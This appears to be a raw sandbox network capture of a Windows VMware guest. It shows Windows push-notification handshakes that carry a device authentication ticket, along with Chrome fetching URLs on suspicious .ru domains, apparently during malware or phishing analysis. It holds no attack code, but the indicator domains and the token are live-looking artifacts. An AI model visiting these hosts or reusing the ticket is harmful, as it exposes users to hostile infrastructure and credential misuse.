                                    2025-02-19 19:40:09 UTC413INHTTP/1.1 200 OK
                                    Date: Wed, 19 Feb 2025 19:40:09 GMT
                                    Content-Type: image/png
                                    Content-Length: 937
                                    Connection: close
                                    Cache-Control: public, max-age=0, must-revalidate
                                    ETag: "6be7ff94b6151f8cfbf08b53a17e2ac1"
                                    Strict-Transport-Security: max-age=15552000; preload
                                    X-Content-Type-Options: nosniff
                                    access-control-allow-origin: *
                                    Server: cloudflare
                                    CF-RAY: 9148ba1e582a427c-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2025-02-19 19:40:09 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 5b 49 44 41 54 58 c3 ed 96 4b 48 54 51 18 c7 67 e6 86 91 04 d1 26 e8 a1 d7 c9 02 21 70 59 2d d4 71 d4 96 2d 42 93 48 82 08 a3 16 51 60 48 59 99 77 4c a7 4c ed b1 0d 8a da 44 a4 e6 a3 b2 a8 a8 4d bb 68 53 8b 48 a2 77 b4 c9 8d 77 46 e7 de 79 7c fd bf 73 cf 9d 39 8e 8f 32 85 36 73 e0 c7 77 e7 dc c7 ff ff 7d df 39 f7 8e c7 93 1b b9 b1 c0 11 6d f7 7b 22 a1 22 71 cc 51 85 c7 78 f3 5a 4f a4 bd 68 e9 85 55 11 79 ec 33 0d 5d 03 5e b3 4d f7 20 fa 30 a7 01 ef 44 37 4c 1a 99 eb 97 44 dc cc 88 b3 b0 77 de eb 0d 61 24 7d 2f 75 fa 17 29 6e e8 ee b1 a6 cc 07 40 17 18 04 a3 e0 06 38 08 56 f3 79 36 a9 9a
                                    Data Ascii: PNGIHDR szzpHYs~[IDATXKHTQg&!pY-q-BHQ`HYwLLDMhSHwwFy|s926sw}9m{""qQxZOhUy3]^M 0D7LDwa$}/u)n@8Vy6


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15192.168.2.64976640.115.3.253443
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:40:12 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 6f 77 62 74 46 44 57 43 59 6b 69 37 45 66 4a 59 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 36 31 33 30 32 38 31 63 30 35 34 34 32 65 0d 0a 0d 0a
                                    Data Ascii: CNT 1 CON 304MS-CV: owbtFDWCYki7EfJY.1Context: 16130281c05442e
                                    2025-02-19 19:40:12 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-02-19 19:40:12 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 6f 77 62 74 46 44 57 43 59 6b 69 37 45 66 4a 59 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 36 31 33 30 32 38 31 63 30 35 34 34 32 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 43 6a 51 74 59 51 6a 2b 67 70 34 59 2b 33 49 73 47 32 79 38 30 46 64 58 2b 39 6e 72 61 54 36 57 57 30 64 69 57 65 79 31 7a 34 32 6d 49 34 72 5a 2b 6a 4a 54 2b 31 59 70 58 33 48 41 4a 72 32 47 30 54 69 2b 45 33 49 46 72 44 4f 61 75 5a 77 45 5a 56 77 4c 65 79 31 55 33 67 6b 76 59 4c 39 35 52 48 72 49 74 4b 56 35 78 2f 6f 6d 55
                                    Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: owbtFDWCYki7EfJY.2Context: 16130281c05442e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCjQtYQj+gp4Y+3IsG2y80FdX+9nraT6WW0diWey1z42mI4rZ+jJT+1YpX3HAJr2G0Ti+E3IFrDOauZwEZVwLey1U3gkvYL95RHrItKV5x/omU
                                    2025-02-19 19:40:12 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 6f 77 62 74 46 44 57 43 59 6b 69 37 45 66 4a 59 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 36 31 33 30 32 38 31 63 30 35 34 34 32 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                    Data Ascii: BND 3 CON\WNS 0 196MS-CV: owbtFDWCYki7EfJY.3Context: 16130281c05442e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-02-19 19:40:12 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                    Data Ascii: 202 1 CON 58
                                    2025-02-19 19:40:12 UTC58INData Raw: 4d 53 2d 43 56 3a 20 79 32 35 51 4b 78 41 73 52 55 2b 36 5a 53 72 64 42 44 6a 7a 70 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                    Data Ascii: MS-CV: y25QKxAsRU+6ZSrdBDjzpg.0Payload parsing failed.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    16192.168.2.649856104.21.96.14431880C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:40:24 UTC561OUTGET /tatay$ylatfyo HTTP/1.1
                                    Host: hjhyx.br-izeffs.ru
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Origin: https://i2.ictacquist.ru
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://i2.ictacquist.ru/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-02-19 19:40:25 UTC824INHTTP/1.1 200 OK
                                    Date: Wed, 19 Feb 2025 19:40:25 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Access-Control-Allow-Origin: *
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bTGE0AT2oz6cALwg2uDSb5za5ZYS%2FIl7Dh9M16ae6n8AuI0ykCkIq46LlLRSdXnxRgillikwnellcv%2FFpQWTxAaxPD2ToWuYpjzKwp9lF8L3HP8dwps1ZxkNY%2FOei903bV1dM70%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 9148ba7efca8c32e-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1620&rtt_var=662&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1139&delivery_rate=1802469&cwnd=185&unsent_bytes=0&cid=e17105506cf86980&ts=862&x=0"
                                    2025-02-19 19:40:25 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                    Data Ascii: 11
                                    2025-02-19 19:40:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    17192.168.2.649871104.21.96.14431880C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:40:26 UTC355OUTGET /tatay$ylatfyo HTTP/1.1
                                    Host: hjhyx.br-izeffs.ru
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-02-19 19:40:27 UTC819INHTTP/1.1 200 OK
                                    Date: Wed, 19 Feb 2025 19:40:27 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Access-Control-Allow-Origin: *
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=znNVyEbUTiH4Ozm5B%2Bs2m8MPYCufvopTuhFAvW2rFYNVY00Y1xA1NTpAKdSOVU4Wm0onbBfAoWVnlffHxaESjC7Fqsf0b4mJZdiVDBflG16BHWoDKyk238H0w7LZtwfjFLNfBRI%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 9148ba8a9aea4363-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1597&rtt_var=604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=933&delivery_rate=1804697&cwnd=242&unsent_bytes=0&cid=0ced6a318182bc3f&ts=877&x=0"
                                    2025-02-19 19:40:27 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                    Data Ascii: 11
                                    2025-02-19 19:40:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18192.168.2.64987540.115.3.253443
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:40:27 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6d 50 69 52 38 64 73 41 71 45 4b 57 78 72 78 63 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 31 39 36 37 33 62 36 65 30 63 30 38 37 65 61 0d 0a 0d 0a
                                    Data Ascii: CNT 1 CON 305MS-CV: mPiR8dsAqEKWxrxc.1Context: f19673b6e0c087ea
                                    2025-02-19 19:40:27 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-02-19 19:40:27 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6d 50 69 52 38 64 73 41 71 45 4b 57 78 72 78 63 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 31 39 36 37 33 62 36 65 30 63 30 38 37 65 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 43 6a 51 74 59 51 6a 2b 67 70 34 59 2b 33 49 73 47 32 79 38 30 46 64 58 2b 39 6e 72 61 54 36 57 57 30 64 69 57 65 79 31 7a 34 32 6d 49 34 72 5a 2b 6a 4a 54 2b 31 59 70 58 33 48 41 4a 72 32 47 30 54 69 2b 45 33 49 46 72 44 4f 61 75 5a 77 45 5a 56 77 4c 65 79 31 55 33 67 6b 76 59 4c 39 35 52 48 72 49 74 4b 56 35 78 2f 6f 6d
                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: mPiR8dsAqEKWxrxc.2Context: f19673b6e0c087ea<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCjQtYQj+gp4Y+3IsG2y80FdX+9nraT6WW0diWey1z42mI4rZ+jJT+1YpX3HAJr2G0Ti+E3IFrDOauZwEZVwLey1U3gkvYL95RHrItKV5x/om
                                    2025-02-19 19:40:27 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6d 50 69 52 38 64 73 41 71 45 4b 57 78 72 78 63 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 31 39 36 37 33 62 36 65 30 63 30 38 37 65 61 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: mPiR8dsAqEKWxrxc.3Context: f19673b6e0c087ea<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-02-19 19:40:27 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                    Data Ascii: 202 1 CON 58
                                    2025-02-19 19:40:27 UTC58INData Raw: 4d 53 2d 43 56 3a 20 33 54 75 43 4b 6b 56 77 33 6b 4f 69 74 72 62 30 4a 6d 75 73 72 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                    Data Ascii: MS-CV: 3TuCKkVw3kOitrb0Jmusrw.0Payload parsing failed.


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19192.168.2.64997540.115.3.253443
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:40:43 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 73 33 50 4a 65 58 70 50 54 6b 69 50 76 54 5a 39 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 33 36 30 63 62 30 36 31 66 35 36 65 38 0d 0a 0d 0a
                                    Data Ascii: CNT 1 CON 304MS-CV: s3PJeXpPTkiPvTZ9.1Context: 6c360cb061f56e8
                                    2025-02-19 19:40:43 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-02-19 19:40:43 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 73 33 50 4a 65 58 70 50 54 6b 69 50 76 54 5a 39 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 33 36 30 63 62 30 36 31 66 35 36 65 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 43 6a 51 74 59 51 6a 2b 67 70 34 59 2b 33 49 73 47 32 79 38 30 46 64 58 2b 39 6e 72 61 54 36 57 57 30 64 69 57 65 79 31 7a 34 32 6d 49 34 72 5a 2b 6a 4a 54 2b 31 59 70 58 33 48 41 4a 72 32 47 30 54 69 2b 45 33 49 46 72 44 4f 61 75 5a 77 45 5a 56 77 4c 65 79 31 55 33 67 6b 76 59 4c 39 35 52 48 72 49 74 4b 56 35 78 2f 6f 6d 55
                                    Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: s3PJeXpPTkiPvTZ9.2Context: 6c360cb061f56e8<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCjQtYQj+gp4Y+3IsG2y80FdX+9nraT6WW0diWey1z42mI4rZ+jJT+1YpX3HAJr2G0Ti+E3IFrDOauZwEZVwLey1U3gkvYL95RHrItKV5x/omU
                                    2025-02-19 19:40:43 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 73 33 50 4a 65 58 70 50 54 6b 69 50 76 54 5a 39 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 33 36 30 63 62 30 36 31 66 35 36 65 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                    Data Ascii: BND 3 CON\WNS 0 196MS-CV: s3PJeXpPTkiPvTZ9.3Context: 6c360cb061f56e8<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-02-19 19:40:43 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                    Data Ascii: 202 1 CON 58
                                    2025-02-19 19:40:43 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6d 77 6a 61 4a 31 4c 49 67 6b 65 6a 47 68 4a 36 71 2f 58 64 6b 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                    Data Ascii: MS-CV: mwjaJ1LIgkejGhJ6q/XdkA.0Payload parsing failed.


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20192.168.2.65002940.113.103.199443
                                    TimestampBytes transferredDirectionData
                                    2025-02-19 19:41:07 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4c 62 2b 50 63 33 72 75 6e 45 75 36 58 54 32 74 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 32 31 36 36 30 61 35 36 64 38 30 36 33 34 30 0d 0a 0d 0a
                                    Data Ascii: CNT 1 CON 305MS-CV: Lb+Pc3runEu6XT2t.1Context: b21660a56d806340
                                    2025-02-19 19:41:07 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-02-19 19:41:07 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4c 62 2b 50 63 33 72 75 6e 45 75 36 58 54 32 74 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 32 31 36 36 30 61 35 36 64 38 30 36 33 34 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 43 6a 51 74 59 51 6a 2b 67 70 34 59 2b 33 49 73 47 32 79 38 30 46 64 58 2b 39 6e 72 61 54 36 57 57 30 64 69 57 65 79 31 7a 34 32 6d 49 34 72 5a 2b 6a 4a 54 2b 31 59 70 58 33 48 41 4a 72 32 47 30 54 69 2b 45 33 49 46 72 44 4f 61 75 5a 77 45 5a 56 77 4c 65 79 31 55 33 67 6b 76 59 4c 39 35 52 48 72 49 74 4b 56 35 78 2f 6f 6d
                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: Lb+Pc3runEu6XT2t.2Context: b21660a56d806340<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCjQtYQj+gp4Y+3IsG2y80FdX+9nraT6WW0diWey1z42mI4rZ+jJT+1YpX3HAJr2G0Ti+E3IFrDOauZwEZVwLey1U3gkvYL95RHrItKV5x/om
                                    2025-02-19 19:41:07 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4c 62 2b 50 63 33 72 75 6e 45 75 36 58 54 32 74 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 32 31 36 36 30 61 35 36 64 38 30 36 33 34 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: Lb+Pc3runEu6XT2t.3Context: b21660a56d806340<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-02-19 19:41:07 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                    Data Ascii: 202 1 CON 58
                                    2025-02-19 19:41:07 UTC58INData Raw: 4d 53 2d 43 56 3a 20 62 63 51 66 4e 36 65 38 68 55 69 46 43 76 64 63 41 66 32 58 56 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                    Data Ascii: MS-CV: bcQfN6e8hUiFCvdcAf2XVQ.0Payload parsing failed.


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21192.168.2.65003240.113.103.199443
                                    TimestampBytes transferredDirectionData
